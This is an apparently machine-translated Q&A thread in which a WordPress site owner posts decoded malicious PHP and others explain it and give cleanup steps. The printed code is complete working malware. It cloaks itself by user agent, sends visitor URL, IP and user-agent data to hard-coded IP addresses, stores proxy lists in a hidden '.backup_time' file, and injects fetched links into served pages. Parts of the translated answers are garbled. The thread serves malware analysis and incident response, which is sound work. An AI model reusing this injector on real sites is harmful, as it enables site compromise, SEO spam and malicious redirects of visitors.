WordPress安装中发现的恶意PHP代码有什么作用？_Php_Wordpress

WordPress安装中发现的恶意PHP代码有什么作用？

php wordpress

WordPress安装中发现的恶意PHP代码有什么作用？,php,wordpress,Php,Wordpress,我能够解码我在一些WordPress文件中找到的以下PHP脚本。出于好奇，有人能告诉我这段代码的实际用途吗？看起来它已经以某种方式复制到同一服务器上的其他WordPress安装中 <?php error_reporting(0); if (!function_exists("ZM5j2q0shf_pirogok")){ function ZM5j2q0shf_pirogok(){ return false; } if (!function_exists("Uno_decode"))

我能够解码我在一些WordPress文件中找到的以下PHP脚本。出于好奇，有人能告诉我这段代码的实际用途吗？看起来它已经以某种方式复制到同一服务器上的其他WordPress安装中

<?php 

error_reporting(0);

if (!function_exists("ZM5j2q0shf_pirogok")){
function ZM5j2q0shf_pirogok(){
return false;
}

if (!function_exists("Uno_decode")){
function Uno_decode($String)
{
    $String = base64_decode($String);
    $Salt="dc5p9dOpBc";
    $StrLen = strlen($String);
    $Seq = "DMEf5HZuPq";
    $Gamma = "";
    while (strlen($Gamma)<$StrLen)
    {
        $Seq = pack("H*",sha1($Gamma.$Seq.$Salt));
        $Gamma.=substr($Seq,0,8);
    }

    return $String^$Gamma;
}
}

if (!function_exists("get_t_dir_mass")){
function get_t_dir_mass() {

if (function_exists("sys_get_temp_dir")) {
    if (@is_writeable(sys_get_temp_dir())) { $res[] = realpath(sys_get_temp_dir()); }
}
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { $res[] = realpath($_ENV["TMP"]); }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { $res[] = realpath( $_ENV["TMPDIR"]); }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { $res[] = realpath( $_ENV["TEMP"]); }
    $tempfile=@tempnam(__FILE__,"");
    if (@file_exists($tempfile)) {
      @unlink($tempfile);
    if (@is_writeable(realpath(dirname($tempfile)))) {$res[] = realpath(dirname($tempfile)); }

    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { $res[] = realpath(@ini_get("upload_tmp_dir")); }
    if (@is_writeable(realpath(session_save_path()))) {$res[] = realpath(session_save_path()); }
    if (@is_writeable(realpath(dirname(__FILE__)))) { $res[] = realpath(dirname(__FILE__)); }

    return array_unique($res);
}
}

if (!function_exists("get_ua")){
function get_ua(){
$name = get_true_name();

foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".") === false){
$tmp = explode("|",$tt);
foreach($tmp as $u){
$know[] = trim($u);
}
}
}
}
}
if(count($know) == 0){
$know[] = "msie";
$know[] = "firefox";
$know[] = "googlebot";
}
return array_unique($know);
}
}

if (!function_exists("get_true_name")){
function get_true_name(){
return ".backup_time";
}
}

if (!function_exists("strposa")){
function strposa($haystack, $needle, $offset=0) {
    if(!is_array($needle)) $needle = array($needle);
    foreach($needle as $query) {
        if(strpos($haystack, $query, $offset) !== false) return true;
    }
    return false;
}
}

if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

$true_ua = get_ua();

if (strposa($ua,$true_ua)){

if (!function_exists("t_dir")){
function t_dir() {
if (function_exists("sys_get_temp_dir")) {
    if (@is_writeable(sys_get_temp_dir())) { return realpath(sys_get_temp_dir()); }
}
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { return realpath($_ENV["TMP"]); }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { return realpath( $_ENV["TMPDIR"]); }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { return realpath( $_ENV["TEMP"]); }
    $tempfile=@tempnam(__FILE__,"");
    if (@file_exists($tempfile)) {
      @unlink($tempfile);
    if (@is_writeable(realpath(dirname($tempfile)))) {return realpath(dirname($tempfile)); }

    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { return realpath(@ini_get("upload_tmp_dir")); }
    if (@is_writeable(realpath(session_save_path()))) { return realpath(session_save_path()); }
    if (@is_writeable(realpath(dirname(__FILE__)))) { return realpath(dirname(__FILE__)); }
    return null;
}
}

if (!function_exists("get_know_ip")){
function get_know_ip(){
$know[] = "151.236.14.86";
$know[] = "149.154.157.133";
$know[] = "37.235.54.48";
$know[] = "31.215.205.196";

$name = get_true_name();

foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".")>0){
$know[] = trim($tt);
}
}
}
}
return array_unique($know);
}
}

if (!function_exists("save_know_ip")){
function save_know_ip($ip){
$name = get_true_name();
$content =  implode(PHP_EOL, $ip);
foreach(get_t_dir_mass() as $t){
$f = fopen($t.DIRECTORY_SEPARATOR.$name,"w");
fputs($f,$content);
fclose($f);
}
}
}

if (!function_exists("ZM5j2q0shf_get_real_ip")){
function ZM5j2q0shf_get_real_ip() {
$proxy_headers = array("CLIENT_IP","FORWARDED","FORWARDED_FOR","FORWARDED_FOR_IP","HTTP_CLIENT_IP","HTTP_FORWARDED","HTTP_FORWARDED_FOR","HTTP_FORWARDED_FOR_IP", "HTTP_PC_REMOTE_ADDR","HTTP_PROXY_CONNECTION","HTTP_VIA", "HTTP_X_FORWARDED", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED_FOR_IP","HTTP_X_IMFORWARDS","HTTP_XROXY_CONNECTION","VIA", "X_FORWARDED", "X_FORWARDED_FOR");
foreach($proxy_headers as $proxy_header)
{
if(isset($_SERVER[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_SERVER[$proxy_header])){return $_SERVER[$proxy_header];}
else if(stristr(",", $_SERVER[$proxy_header]) !== FALSE)
{$proxy_header_temp = trim(array_shift(explode(",", $_SERVER[$proxy_header]))); 
if(($pos_temp = stripos($proxy_header_temp, ":")) !== FALSE) $proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp); 
if(preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp) )return $proxy_header_temp;
}
}
return $_SERVER["REMOTE_ADDR"];
}
}

if (!function_exists("ZM5j2q0shf_get_url")){
function ZM5j2q0shf_get_url(){ 
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
if (strpos($url,"?") !== false){
$url = substr($url,0,strpos($url,"?"));
}
return $url;
}
}


if (!function_exists("ZM5j2q0shf_get_contents")){
function ZM5j2q0shf_get_contents($ip, $page){
if((function_exists("curl_init")) && (function_exists("curl_exec"))){
    $ch = curl_init("http://" .$ip . "/" .$page);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    return $ult;
    }

if (ini_get("allow_url_fopen")) {
    $ult = trim(@file_get_contents("http://" .$ip . "/" .$page));
    return $ult;
    }
    $fp = fsockopen($ip, 80, $errno, $errstr, 30);
    if ($fp) {$out = "GET $page HTTP/1.0\r\n";
    $out .= "Host: $ip\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    $ret = "";
    while (!feof($fp)) {$ret  .=  fgets($fp, 128);}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}
return $ult;
}
}

if (!function_exists("ZM5j2q0shf_samui_get_links")){
function ZM5j2q0shf_samui_get_links(){

$all = get_know_ip();
shuffle($all);
$url = ZM5j2q0shf_get_url();
$real_ip = ZM5j2q0shf_get_real_ip();
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
$aid = "1001";
$cod = md5($url.time());
$check = md5($cod);
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
$ref = urlencode(strtolower($_SERVER["HTTP_REFERER"]));
$page = "/ml.php?mother=mycompany.com&cr=1&aid=".$aid."&url=".$url."&ip=".$real_ip."&ua=".$ua."&cod=".$cod."&ref=".$ref;

foreach ($all as $ip){
$tc = ZM5j2q0shf_get_contents(trim($ip),$page);
$pos = strpos($tc, $check);
if ($pos !== false){
$proxy_list = substr($tc,0,$pos);

save_know_ip(explode("\n",$proxy_list));


$links = substr($tc,$pos+32);
return $links;
}
}
}
}

if (!function_exists("ZM5j2q0shf_mod_con")){
function ZM5j2q0shf_mod_con($con){
if (strpos($con,"<body") !== false) {
$text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>".ZM5j2q0shf_samui_get_links(), $con,1);  
return $text;
} else {return $con;}
}
}


if (!function_exists("ZM5j2q0shf_callback")){
function ZM5j2q0shf_callback($buf){
if (headers_sent()){
if (in_array("Content-Encoding: gzip", headers_list())){
$tmpfname = tempnam(t_dir(), "FOO");$zf = fopen($tmpfname, "w"); fputs($zf, $buf); fclose($zf); $zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = ZM5j2q0shf_mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = ZM5j2q0shf_mod_con($buf); }} else {$contents = ZM5j2q0shf_mod_con($buf);}return($contents);
}
}

ob_start("ZM5j2q0shf_callback");

}
}
}

?>

下载压缩负载并将其存储到您的一个临时目录将转到已知的父ip。然后根据负载将html注入html页面顶部，如下所示

。它还检查可用于下载更多坏人代码以注入的新ip。

以防您在根目录上找到.backup\u time文件，并且您的站点会减慢您被黑客攻击的速度，并且您的站点会重定向移动用户以下载恶意应用程序

自从我去过那里并做了那件事，我就解释了

识别问题 -响应时间慢（TFB非常大，可能是一分钟）\ -检查页面时的第二个正文（！）标记 -移动用户错误的重新定向 -如果在可湿性粉剂网站，那么管理员也会有轻微的变化

恢复速度快且相对较好

检测哪些.php文件最近已更新并变大。检查index.php甚至config.php的第一行（从字面上看，滚动到第一行的最右边），查看您没有看到的异常长字符串。从根文件夹和子文件夹中的任何位置删除它（是的，它可能迁移得更深，或者在文件夹层次结构中迁移得更高）
如果您执行了上一条消息，但刷新后仍然返回奇怪的文件，请更仔细和彻底地重复上一步。你可能错过了它出现的一些文件
为了最好地确保您已结束更改ftp密码，您可能是最初的黑客漏洞

我的服务器可能是通过WP插件或smt感染的，但感染在文件夹层次结构中向上和向下传播，即使在不是WP，而是简单php的站点中也是如此

希望有帮助

这个问题似乎离题了，因为我们不是代码解释服务机构。这可能是一个很好的问题。感谢胜利，这很有帮助！查看ip地址列表？比如

151.236.14.86

试试谷歌搜索，我打赌你会发现一些有用的信息。可能是插件的名称与问题等。祝你好运！我通过让wordpress启动文件检查其本身的长度是否为预期长度来防止这种情况发生。